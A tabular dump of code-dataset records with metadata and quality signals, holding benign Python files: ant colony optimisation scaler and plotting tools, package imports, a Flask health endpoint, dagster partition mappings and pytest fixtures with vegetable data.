hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d3127c44f939aa6f284fa7cf5ddb67cb5977ea13
| 13,996
|
py
|
Python
|
antco/tools.py
|
FernandoGaGu/Ant-Colony-Optimisation
|
e1a1ee27f55c63c768964e80f38020f1aef664d7
|
[
"BSD-3-Clause"
] | 1
|
2021-09-09T04:14:06.000Z
|
2021-09-09T04:14:06.000Z
|
antco/tools.py
|
FernandoGaGu/Ant-Colony-Optimisation
|
e1a1ee27f55c63c768964e80f38020f1aef664d7
|
[
"BSD-3-Clause"
] | null | null | null |
antco/tools.py
|
FernandoGaGu/Ant-Colony-Optimisation
|
e1a1ee27f55c63c768964e80f38020f1aef664d7
|
[
"BSD-3-Clause"
] | null | null | null |
# Module containing frequently used tools already implemented.
#
# Author: Fernando García Gutiérrez
# Email: fegarc05@ucm.es
#
import numpy as np
import matplotlib.pyplot as plt
from .base import ScoreScaler
class MinMaxScaler(ScoreScaler):
    """Min-Max scaler mapping ant scores onto the interval [min_val, max_val].

    Parameters
    ----------
    min_val: float, default=0.0
        Lower bound of the target range.
    max_val: float, default=1.0
        Upper bound of the target range.
    max_historic: bool, default=False
        If True, the best historical score (instead of the current maximum of the
        scores being scaled) is used as the maximum for the normalisation.
    """
    def __init__(self, min_val: float = 0.0, max_val: float = 1.0, max_historic: bool = False):
        self._min_val = min_val
        self._max_val = max_val
        self._max_historic = max_historic

    def __repr__(self):
        return (f'MinMaxScaler(min_val={self._min_val}, max_val={self._max_val}, '
                f'max_historic={self._max_historic})')

    def scale(self, ant_scores: np.ndarray, best_historic: float):
        """Scale ant_scores to [min_val, max_val] using Min-Max normalisation."""
        lower = np.min(ant_scores)
        upper = best_historic if self._max_historic else np.max(ant_scores)
        if lower == upper:
            # All scores are identical: return ones to avoid dividing by zero.
            return np.ones(shape=ant_scores.shape)
        normalised = (ant_scores - lower) / (upper - lower)
        span = self._max_val - self._min_val
        return normalised * span + self._min_val
class HyperparameterCheckerAS(object):
    """
    Class to plot the effects of the hyperparameters associated with the Ant System (AS) pheromone
    updating strategy on pheromone updating.

    The plot() method draws two graphs: the first represents the increase in the values of the
    pheromone matrix assuming that all ants contribute to the update of the same connection, and
    the second the decrease in the pheromone values when no ant visits a given connection during
    all the plotted iterations.

    In the increment graph several lines are plotted, each corresponding to the random assignment
    of a score to each ant in the range of values indicated in the legend.

    Parameters
    ----------
    n_ants: int
        Number of ants used for updating the pheromone matrix.
    pher_init: float
        Initial value of the pheromone matrix.
    evaporation: float
        Pheromone evaporation parameter.
    weight: float, default=1.0
        Weight used to model the contribution of each ant to the pheromone update (it is assumed
        that the ants' scores have been scaled to the range [0,1]).
    seed: int, default=None
        Random seed.

    Methods
    -------
    plot(num_iterations: int = 100, figsize: tuple = (10, 10), linewidth: float = 2.5,
         title_size: int = 15, save_plot: str = None):
        Plot the increase and decrease of the pheromone matrix values over the specified
        iterations.
    """
    def __init__(self, n_ants: int, pher_init: float, evaporation: float, weight: float = 1.0,
                 seed: int = None):
        self.n_ants = n_ants
        self.pher_init = pher_init
        self.evaporation = evaporation
        self.weight = weight
        self.seed = seed

    def plot(self, num_iterations: int = 100, figsize: tuple = (10, 10), linewidth: float = 2.5,
             title_size: int = 15, save_plot: str = None):
        """
        Parameters
        ----------
        num_iterations: int, default=100
            Number of iterations to simulate.
        figsize: tuple, default=(10, 10)
            Tuple indicating the size of the figure.
        linewidth: float, default=2.5
            Thickness of the lines in the plot.
        title_size: int, default=15
            Size of the title of each graphic.
        save_plot: str, default=None
            File in which to save the generated graph; if no value is provided the graph will
            not be saved.
        """
        iterations = list(range(num_iterations))
        # One simulated increase curve per score range; all curves share the same
        # hyperparameters and the same (optional) random seed.
        curves = [((0.99, 1.0), 'Scores [0.99-1.0]', '#641E16'),
                  ((0.75, 1.0), 'Scores [0.75-1.0]', '#A93226'),
                  ((0.50, 1.0), 'Scores [0.50-1.0]', '#D98880'),
                  ((0.25, 1.0), 'Scores [0.25-1.0]', '#F2D7D5')]
        fig, axes = plt.subplots(2, figsize=figsize)
        for score_range, label, color in curves:
            pher_increase = self._pherIncrease(
                n_ants=self.n_ants, pher_init=self.pher_init, evaporation=self.evaporation,
                weight=self.weight, iterations=iterations, score_range=score_range,
                seed=self.seed)
            axes[0].plot(iterations, pher_increase, label=label, color=color,
                         linewidth=linewidth)
        pher_decrease = self._pherDecrease(
            pher_init=self.pher_init, evaporation=self.evaporation, iterations=iterations)
        axes[1].plot(iterations, pher_decrease, color='#2980B9', linewidth=linewidth)
        axes[0].set_title('Pheromone increase', fontsize=title_size)
        axes[0].spines['top'].set_visible(False)
        axes[0].spines['right'].set_visible(False)
        axes[0].legend()
        axes[1].set_title('Pheromone decrease', fontsize=title_size)
        axes[1].spines['top'].set_visible(False)
        axes[1].spines['right'].set_visible(False)
        if save_plot is not None:
            plt.savefig(save_plot, dpi=150)
        plt.show()

    @staticmethod
    def _pherIncrease(n_ants: int, pher_init: float, evaporation: float, weight: float,
                      iterations: list, score_range: tuple, seed: int):
        """ Simulate the pheromone update (increasing the values) according to the AS update
        strategy.

        BUG FIX: the ant-contribution weight was previously applied twice (once when summing
        the random scores and again in the update rule), effectively scaling the deposit by
        weight**2; it is now applied exactly once.
        """
        if seed is not None:
            np.random.seed(seed)
        pher_increase = []
        pher = pher_init
        for _ in iterations:
            # Total (unweighted) score deposited by all ants in this iteration.
            score = np.sum(np.random.uniform(low=score_range[0], high=score_range[1],
                                             size=n_ants))
            # AS update rule: evaporation followed by weighted deposition.
            pher = (1 - evaporation) * pher + score * weight
            pher_increase.append(pher)
        return pher_increase

    @staticmethod
    def _pherDecrease(pher_init: float, evaporation: float, iterations: list):
        """ Simulate the pheromone update (decreasing the values) according to the AS update
        strategy. """
        pher_decrease = []
        pher = pher_init
        for _ in iterations:
            # Pure evaporation: no ant deposits on this connection.
            pher = (1 - evaporation) * pher
            pher_decrease.append(pher)
        return pher_decrease
class HyperparameterCheckerMMAS(object):
    """
    Class to plot the effects of the hyperparameters associated with the Min-Max Ant System (MMAS)
    pheromone updating strategy on pheromone updating.
    The plot() method will plot two graphs, the first one representing the increase in the values
    of the pheromone matrix assuming that all ants used for its update are used, i.e. in a real
    case all ants that have visited the same connection, and the second one the decrease in the
    value of the pheromone matrix when no ant visits a given connection during all the plotted
    iterations.
    In the increment graph, several lines will be plotted, each corresponding to the random
    assignment of a score to each ant in the range of values indicated in the legend.
    Parameters
    ----------
    n_ants: int
        Number of ants used for updating the pheromone matrix.
    pher_init: float
        Initial value of the pheromone matrix.
    evaporation: float
        Pheromone evaporation parameter.
    limits: tuple
        Bounds of the MMAS update strategy.
    weight: float, default=1.0
        Weight used to model the contribution of each ant to the pheromone update (it is assumed
        that the ants' scores have been scaled to the range [0,1]).
    seed: int, default=None
        Random seed.
    Methods
    -------
    plot(num_iterations: int = 100, figsize: tuple = (10, 10), linewidth: float = 2.5,
         title_size: int = 15, save_plot: str = None):
        Method to plotting the increase and decrease of pheromone matrix values over specified
        iterations.
    """
    def __init__(self, n_ants: int, pher_init: float, evaporation: float, limits: tuple,
                 weight: float = 1.0, seed: int = None):
        # Simulation hyperparameters; see the class docstring for their meaning.
        self.n_ants = n_ants
        self.pher_init = pher_init
        self.evaporation = evaporation
        self.limits = limits  # (min, max) bounds used to clamp the pheromone value
        self.weight = weight
        self.seed = seed

    def plot(self, num_iterations: int = 100, figsize: tuple = (10, 10), linewidth: float = 2.5,
             title_size: int = 15, save_plot: str = None):
        """
        Parameters
        ----------
        num_iterations: int, default=100
            Number of iterations to simulate.
        figsize: tuple, default=(10, 10)
            Tuple indicating the size of the figure.
        linewidth: float, default=2.5
            Thickness of the lines in the plot.
        title_size: int, default=15
            Size of the title of each graphic.
        save_plot: str, default=None
            File in which to save the generated graph, if no value is provided the graph will not
            be saved.
        """
        iterations = [it for it in range(num_iterations)]
        # One simulated increase curve per score range; all four share the same
        # hyperparameters and the same (optional) random seed.
        pher_increase_100 = self._pherIncrease(
            n_ants=self.n_ants, pher_init=self.pher_init, evaporation=self.evaporation,
            limits=self.limits, weight=self.weight, iterations=iterations, score_range=(0.99, 1.0),
            seed=self.seed)
        pher_increase_75 = self._pherIncrease(
            n_ants=self.n_ants, pher_init=self.pher_init, evaporation=self.evaporation,
            limits=self.limits, weight=self.weight, iterations=iterations, score_range=(0.75, 1.0),
            seed=self.seed)
        pher_increase_50 = self._pherIncrease(
            n_ants=self.n_ants, pher_init=self.pher_init, evaporation=self.evaporation,
            limits=self.limits, weight=self.weight, iterations=iterations, score_range=(0.50, 1.0),
            seed=self.seed)
        pher_increase_25 = self._pherIncrease(
            n_ants=self.n_ants, pher_init=self.pher_init, evaporation=self.evaporation,
            limits=self.limits, weight=self.weight, iterations=iterations, score_range=(0.25, 1.0),
            seed=self.seed)
        pher_decrease = self._pherDecrease(
            pher_init=self.pher_init, evaporation=self.evaporation, limits=self.limits,
            iterations=iterations)
        # Top axis: pheromone increase curves; bottom axis: pure-evaporation decay.
        fig, axes = plt.subplots(2, figsize=figsize)
        axes[0].plot(iterations, pher_increase_100, label='Scores [0.99-1.0]', color='#641E16',
                     linewidth=linewidth)
        axes[0].plot(iterations, pher_increase_75, label='Scores [0.75-1.0]', color='#A93226',
                     linewidth=linewidth)
        axes[0].plot(iterations, pher_increase_50, label='Scores [0.50-1.0]', color='#D98880',
                     linewidth=linewidth)
        axes[0].plot(iterations, pher_increase_25, label='Scores [0.25-1.0]', color='#F2D7D5',
                     linewidth=linewidth)
        axes[1].plot(iterations, pher_decrease, color='#2980B9', linewidth=linewidth)
        axes[0].set_title('Pheromone increase', fontsize=title_size)
        axes[0].spines['top'].set_visible(False)
        axes[0].spines['right'].set_visible(False)
        axes[0].legend()
        axes[1].set_title('Pheromone decrease', fontsize=title_size)
        axes[1].spines['top'].set_visible(False)
        axes[1].spines['right'].set_visible(False)
        if save_plot is not None:
            plt.savefig(save_plot, dpi=150)
        plt.show()

    @staticmethod
    def _pherIncrease(n_ants: int, pher_init: float, evaporation: float, limits: tuple, weight: float,
                      iterations: list, score_range: tuple, seed: int):
        """ Simulate the pheromone update (increasing the values) according to the MMAS update
        strategy. """
        if seed is not None:
            np.random.seed(seed)
        pher_increase = []
        pher = pher_init
        for it in iterations:
            # One random score per ant, drawn uniformly from score_range.
            scores = np.random.uniform(low=score_range[0], high=score_range[1], size=n_ants)
            # NOTE(review): evaporation is applied once per ant (i.e. n_ants times per
            # iteration), whereas the AS variant in this file evaporates once per iteration
            # and deposits the summed scores -- confirm this per-ant update is intended.
            for score in scores:
                pher = (1 - evaporation) * pher + score * weight
                # Clamp to the MMAS bounds after every deposit.
                if pher < limits[0]:
                    pher = limits[0]
                if pher > limits[1]:
                    pher = limits[1]
            pher_increase.append(pher)
        return pher_increase

    @staticmethod
    def _pherDecrease(pher_init: float, evaporation: float, limits: tuple, iterations: list):
        """ Simulate the pheromone update (decreasing the values) according to the MMAS update
        strategy. """
        pher_decrease = []
        pher = pher_init
        for it in iterations:
            # Pure evaporation, clamped to the MMAS bounds each iteration.
            pher = (1 - evaporation) * pher
            if pher < limits[0]:
                pher = limits[0]
            if pher > limits[1]:
                pher = limits[1]
            pher_decrease.append(pher)
        return pher_decrease
| 41.286136
| 102
| 0.638325
| 1,834
| 13,996
| 4.738277
| 0.119956
| 0.033142
| 0.012428
| 0.018412
| 0.881243
| 0.874223
| 0.861795
| 0.851784
| 0.850403
| 0.850403
| 0
| 0.029028
| 0.266505
| 13,996
| 338
| 103
| 41.408284
| 0.817456
| 0.333024
| 0
| 0.731707
| 0
| 0
| 0.046642
| 0.010887
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067073
| false
| 0
| 0.018293
| 0.006098
| 0.146341
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d357d177b7c6a0066ad523bfd74841b7f6fa0b5b
| 156
|
py
|
Python
|
source-py/pyBKT/models/__init__.py
|
bukeplato/pyBKT
|
733a4ccf0de78bef7d47b5a6af7131c7778560db
|
[
"MIT"
] | 132
|
2018-03-22T06:04:14.000Z
|
2022-03-24T21:54:27.000Z
|
source-py/pyBKT/models/__init__.py
|
bukeplato/pyBKT
|
733a4ccf0de78bef7d47b5a6af7131c7778560db
|
[
"MIT"
] | 25
|
2018-01-10T14:00:48.000Z
|
2022-03-22T04:00:47.000Z
|
source-py/pyBKT/models/__init__.py
|
bukeplato/pyBKT
|
733a4ccf0de78bef7d47b5a6af7131c7778560db
|
[
"MIT"
] | 46
|
2017-09-12T04:30:58.000Z
|
2022-03-10T08:54:52.000Z
|
from pyBKT.models.Model import Model
from pyBKT.models.Roster import Roster
from pyBKT.models.Roster import StateType
from pyBKT.models.Roster import State
| 31.2
| 41
| 0.846154
| 24
| 156
| 5.5
| 0.333333
| 0.272727
| 0.454545
| 0.477273
| 0.613636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 156
| 4
| 42
| 39
| 0.942857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d38e03fe8d9f816898be5a70acf974eb983ebdbf
| 123
|
py
|
Python
|
blueprint/__init__.py
|
mr-aliraza/custom-python-project-blueprint
|
5e55fb56c523606a887c8db9c04d781d25062ddc
|
[
"MIT"
] | null | null | null |
blueprint/__init__.py
|
mr-aliraza/custom-python-project-blueprint
|
5e55fb56c523606a887c8db9c04d781d25062ddc
|
[
"MIT"
] | null | null | null |
blueprint/__init__.py
|
mr-aliraza/custom-python-project-blueprint
|
5e55fb56c523606a887c8db9c04d781d25062ddc
|
[
"MIT"
] | null | null | null |
from .app import Server # noqa: F401
from .grpc import Echoer # noqa: F401
from .generated import echo_pb2 # noqa: F401
| 30.75
| 45
| 0.731707
| 19
| 123
| 4.684211
| 0.578947
| 0.269663
| 0.269663
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.10101
| 0.195122
| 123
| 3
| 46
| 41
| 0.79798
| 0.260163
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d39a97c96505081d97f2fb83d8992825523019d3
| 78
|
py
|
Python
|
app/views/up.py
|
valentinDruzhinin/CategoryMappingApp
|
8d9bd64d0284c0024a851592e9e9d2bc06606557
|
[
"MIT"
] | null | null | null |
app/views/up.py
|
valentinDruzhinin/CategoryMappingApp
|
8d9bd64d0284c0024a851592e9e9d2bc06606557
|
[
"MIT"
] | null | null | null |
app/views/up.py
|
valentinDruzhinin/CategoryMappingApp
|
8d9bd64d0284c0024a851592e9e9d2bc06606557
|
[
"MIT"
] | null | null | null |
from flask import jsonify
def up():
    """Health-check endpoint: always responds with a happy status payload."""
    payload = {'status': 'happy'}
    return jsonify(payload)
| 13
| 39
| 0.653846
| 10
| 78
| 5.1
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.192308
| 78
| 5
| 40
| 15.6
| 0.809524
| 0
| 0
| 0
| 0
| 0
| 0.141026
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
6caa18f47d7257c1cb835c1a4dc1e1aea06e5f29
| 2,900
|
py
|
Python
|
python_modules/dagster/dagster/core/asset_defs/partition_mapping.py
|
rpatil524/dagster
|
6f918d94cbd543ab752ab484a65e3a40fd441716
|
[
"Apache-2.0"
] | null | null | null |
python_modules/dagster/dagster/core/asset_defs/partition_mapping.py
|
rpatil524/dagster
|
6f918d94cbd543ab752ab484a65e3a40fd441716
|
[
"Apache-2.0"
] | null | null | null |
python_modules/dagster/dagster/core/asset_defs/partition_mapping.py
|
rpatil524/dagster
|
6f918d94cbd543ab752ab484a65e3a40fd441716
|
[
"Apache-2.0"
] | 1
|
2019-09-11T03:02:27.000Z
|
2019-09-11T03:02:27.000Z
|
from abc import ABC, abstractmethod
from dagster.core.definitions.partition import PartitionsDefinition
from dagster.core.definitions.partition_key_range import PartitionKeyRange
class PartitionMapping(ABC):
    """Defines a correspondence between the partitions in an asset and the partitions in an asset
    that it depends on.
    """
    @abstractmethod
    def get_upstream_partitions_for_partition_range(
        self,
        downstream_partition_key_range: PartitionKeyRange,
        downstream_partitions_def: PartitionsDefinition,
        upstream_partitions_def: PartitionsDefinition,
    ) -> PartitionKeyRange:
        """Returns the range of partition keys in the upstream asset that include data necessary
        to compute the contents of the given partition key range in the downstream asset.

        Args:
            downstream_partition_key_range (PartitionKeyRange): The range of partition keys in the
                downstream asset.
            downstream_partitions_def (PartitionsDefinition): The partitions definition for the
                downstream asset.
            upstream_partitions_def (PartitionsDefinition): The partitions definition for the
                upstream asset.
        """

    @abstractmethod
    def get_downstream_partitions_for_partition_range(
        self,
        upstream_partition_key_range: PartitionKeyRange,
        downstream_partitions_def: PartitionsDefinition,
        upstream_partitions_def: PartitionsDefinition,
    ) -> PartitionKeyRange:
        """Returns the range of partition keys in the downstream asset that use the data in the given
        partition key range of the upstream asset.

        Args:
            upstream_partition_key_range (PartitionKeyRange): The range of partition keys in the
                upstream asset.
            downstream_partitions_def (PartitionsDefinition): The partitions definition for the
                downstream asset.
            upstream_partitions_def (PartitionsDefinition): The partitions definition for the
                upstream asset.
        """
class IdentityPartitionMapping(PartitionMapping):
    """Partition mapping in which upstream and downstream assets share the same partition
    scheme: every partition key range maps to itself in both directions.
    """
    def get_upstream_partitions_for_partition_range(
        self,
        downstream_partition_key_range: PartitionKeyRange,
        downstream_partitions_def: PartitionsDefinition,  # pylint: disable=unused-argument
        upstream_partitions_def: PartitionsDefinition,  # pylint: disable=unused-argument
    ) -> PartitionKeyRange:
        """Identity mapping: the upstream range is the downstream range, unchanged."""
        return downstream_partition_key_range

    def get_downstream_partitions_for_partition_range(
        self,
        upstream_partition_key_range: PartitionKeyRange,
        downstream_partitions_def: PartitionsDefinition,  # pylint: disable=unused-argument
        upstream_partitions_def: PartitionsDefinition,  # pylint: disable=unused-argument
    ) -> PartitionKeyRange:
        """Identity mapping: the downstream range is the upstream range, unchanged."""
        return upstream_partition_key_range
| 43.283582
| 101
| 0.72931
| 288
| 2,900
| 7.100694
| 0.184028
| 0.076284
| 0.193643
| 0.099756
| 0.807824
| 0.718826
| 0.718826
| 0.718826
| 0.718826
| 0.696333
| 0
| 0
| 0.227241
| 2,900
| 66
| 102
| 43.939394
| 0.912539
| 0.425862
| 0
| 0.787879
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.121212
| false
| 0
| 0.090909
| 0.060606
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6caafb4eff3832720c175d5e7fc195cd38085813
| 37,652
|
py
|
Python
|
tests/conftest.py
|
swright573/django-vertical-multi-columns
|
f2188b71a3b1743a1acf0dbc90ee20289ea8bacd
|
[
"BSD-2-Clause"
] | 2
|
2021-04-07T14:25:43.000Z
|
2021-07-01T14:08:19.000Z
|
tests/conftest.py
|
swright573/django-vertical-multi-columns
|
f2188b71a3b1743a1acf0dbc90ee20289ea8bacd
|
[
"BSD-2-Clause"
] | 3
|
2021-02-17T15:16:06.000Z
|
2021-03-30T13:17:01.000Z
|
tests/conftest.py
|
swright573/django-vertical-multi-columns
|
f2188b71a3b1743a1acf0dbc90ee20289ea8bacd
|
[
"BSD-2-Clause"
] | 1
|
2021-02-11T13:50:52.000Z
|
2021-02-11T13:50:52.000Z
|
# -*- coding: utf-8 -*-
"""
Common elements for pytest tests
"""
import random
import pytest # pylint: disable=import-error
from django.conf import settings # pylint: disable=import-error
def pytest_configure():
    """Configure a minimal Django settings module before the test session starts."""
    installed_apps = ["vertical_multi_columns"]
    settings.configure(INSTALLED_APPS=installed_apps)
# Fixtures for setting NUMBER_OF_COLUMNS
# Each fixture mutates the global Django `settings` object in place, so a test
# requesting one of them runs under the corresponding VERTICAL_MULTI_COLUMNS value.
@pytest.fixture()
def settings_number_of_columns_null():
    """There is no setting for NUMBER_OF_COLUMNS"""
    settings.VERTICAL_MULTI_COLUMNS = None

@pytest.fixture()
def settings_number_of_columns_2():
    """Django setting for NUMBER_OF_COLUMNS is 2"""
    settings.VERTICAL_MULTI_COLUMNS = [{"NUMBER_OF_COLUMNS": 2}]

@pytest.fixture()
def settings_number_of_columns_3():
    """Django setting for NUMBER_OF_COLUMNS is 3"""
    settings.VERTICAL_MULTI_COLUMNS = [{"NUMBER_OF_COLUMNS": 3}]

@pytest.fixture()
def settings_number_of_columns_4():
    """Django setting for NUMBER_OF_COLUMNS is 4"""
    settings.VERTICAL_MULTI_COLUMNS = [{"NUMBER_OF_COLUMNS": 4}]

@pytest.fixture()
def settings_number_of_columns_5():
    """Django setting for NUMBER_OF_COLUMNS is 5"""
    settings.VERTICAL_MULTI_COLUMNS = [{"NUMBER_OF_COLUMNS": 5}]
# Fixtures for representing data input to a VMC view
# Each entry is a dict with keys: id, name, colour, count, herb.
@pytest.fixture()
def entries_27():
    """Input data with 27 entries"""
    # NOTE(review): only 26 entries are present below despite the name/docstring
    # saying 27 -- confirm whether one entry was lost.
    return [
        {"id": 5, "name": "Asparagus", "colour": "green", "count": 9, "herb": False},
        {"id": 2, "name": "Basil", "colour": "green", "count": 5, "herb": True},
        {"id": 6, "name": "Beans", "colour": "yellow", "count": 5, "herb": False},
        {"id": 8, "name": "Broccoli", "colour": "green", "count": 8, "herb": False},
        {"id": 9, "name": "Brussels Sprouts", "colour": "green", "count": 16, "herb": False},
        {"id": 10, "name": "Cabbage", "colour": "green", "count": 7, "herb": False},
        {"id": 21, "name": "Cantaloupe", "colour": "orange", "count": 10, "herb": False},
        {"id": 11, "name": "Cauliflower", "colour": "white", "count": 11, "herb": False},
        {"id": 12, "name": "Celery", "colour": "green", "count": 6, "herb": False},
        {"id": 13, "name": "Chives", "colour": "green", "count": 6, "herb": True},
        {"id": 38, "name": "Cilantro", "colour": "green", "count": 8, "herb": True},
        {"id": 14, "name": "Collard Greens", "colour": "green", "count": 14, "herb": False},
        {"id": 45, "name": "Dill", "colour": "green", "count": 4, "herb": True},
        {"id": 36, "name": "Oregano", "colour": "green", "count": 7, "herb": True},
        {"id": 39, "name": "Parsley", "colour": "green", "count": 7, "herb": True},
        {"id": 22, "name": "Parsnips", "colour": "white", "count": 8, "herb": False},
        {"id": 23, "name": "Peas", "colour": "green", "count": 4, "herb": False},
        {"id": 25, "name": "Potatoes", "colour": "white", "count": 8, "herb": False},
        {"id": 26, "name": "Pumpkins", "colour": "orange", "count": 8, "herb": False},
        {"id": 37, "name": "Rosemary", "colour": "green", "count": 8, "herb": True},
        {"id": 41, "name": "Sage", "colour": "green", "count": 4, "herb": True},
        {"id": 29, "name": "Spinach", "colour": "green", "count": 7, "herb": False},
        {"id": 30, "name": "Summer Squash", "colour": "yellow", "count": 12, "herb": False},
        {"id": 16, "name": "Sweet Corn", "colour": "yellow", "count": 10, "herb": False},
        {"id": 33, "name": "Watermelon", "colour": "red", "count": 10, "herb": False},
        {"id": 34, "name": "Winter Squash", "colour": "orange", "count": 13, "herb": False},
    ]

@pytest.fixture()
def entries_4():
    """Input data with 4 entries"""
